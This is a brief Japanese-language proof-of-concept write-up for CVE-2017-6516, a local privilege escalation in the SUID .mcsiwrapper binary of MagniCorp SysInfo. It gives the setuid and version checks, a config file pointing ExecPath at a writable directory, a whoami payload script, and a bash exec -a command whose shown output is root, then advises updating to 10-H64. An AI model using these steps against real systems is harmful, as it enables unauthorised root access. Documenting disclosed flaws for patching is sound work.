
CVE-2017-6516を悪用するためのPoC / 手法
CVE-2017-6516 は、MagniCorp SysInfo のバージョン 10-H64 未満の .mcsiwrapper バイナリを標的とする特権昇格の脆弱性です。このバイナリに SUID ビットが設定され、かつ古いバージョンである場合、ユーザーはバイナリの所有者(多くの場合 root)として任意のコードを実行できる可能性があります。
.mcsiwrapper に setuid が設定されている必要があります:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper がバージョン 10-H64 未満である必要があります:$ .mcsiwrapper --version
<Version under 10-H64>
次の内容で config ファイルを作成します:
ExecPath=<書き込み可能なディレクトリへのパス>
ExecPath ディレクトリにペイロードの実行可能ファイルを作成します。例:
#!/bin/sh
whoami
そして実行可能にします:
$ chmod +x payload
コマンドを実行します:
$ bash -c "exec -a payload .mcsiwrapper --configfile <設定ファイルへのパス>"
root
.mcsiwrapper を少なくとも 10-H64 に更新してください。